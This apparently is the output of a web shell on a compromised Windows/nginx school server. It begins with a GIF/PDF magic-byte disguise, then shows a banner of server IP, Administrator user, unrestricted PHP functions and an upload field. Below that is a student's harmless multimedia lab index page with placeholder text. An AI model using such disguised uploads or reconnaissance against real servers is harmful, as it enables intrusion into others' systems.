GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/GrantOjanen/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>MMDT1144 Multimedia & Web Lab Assignments</title> <link rel="stylesheet" href="sty.css"> </head> <body> <header> <h1>MMDT1144 Multimedia & Web Lab Assignments</h1> <h2>Grant Ojanen</h2> </header> <nav> <ul> <? for ($i = 0; $i < 20; $i++) { if (file_exists(getcwd() . DIRECTORY_SEPARATOR . 'Lab' . $i)) { echo '<li><a href="Lab' . $i . '">Lab ' . $i . '</a></li>'; } } ?> <ul> </nav> <main> <section> <h3>Section 1</h3> <article> <h4>Article 1</h4> <p>fvhbdfbisfdbhshksd</p> </article> <article> <h4>Article 2</h4> <p>wdsgffsrgthfserghttgrferthrt</p> </article> </section> <section> <h3>Section 2</h3> <article> <h4>Article 1</h4> <p>fvhbdfbisfdbhshksd</p> </article> <article> <h4>Article 2</h4> <p>wdsgffsrgthfserghttgrferthrt</p> </article> </section> </main> <footer> <address>Copyright © 2017 Grant Ojanen</address> </footer> </body> </html>